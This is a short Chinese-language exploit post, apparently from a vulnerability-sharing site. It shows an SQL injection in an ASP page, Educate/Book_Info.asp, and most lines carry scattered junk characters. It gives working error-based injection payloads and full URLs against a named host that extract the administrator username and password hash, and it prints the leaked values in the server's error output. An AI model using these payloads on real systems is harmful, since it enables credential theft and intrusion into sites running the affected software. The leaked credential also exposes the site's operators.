漏洞出现在Educate/Book_Info.asp! f. r# H& i3 x3 l# r" G
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出9 h, w( g% N$ ?% [ D; C# q
exp:如下' l; p4 b8 R8 a8 U
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 _' L7 l/ U! P8 K1 Q9 m% }+ v
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" @* t; P7 R S4 {1 `http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)6 C% n% H& B" _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'# ~3 ^8 f. r6 N
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。7 `& \6 h ~/ Y0 d
/Educate/Book_Info.asp,行 8
' V1 f! K9 `) _/ ?http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 ]" X0 h$ v4 B% d0 `+ XMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
}. N" O" X) `+ F将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ C" w! i$ o0 a) _& w5 d4 j7 q! M1 V/Educate/Book_Info.asp,行 8 |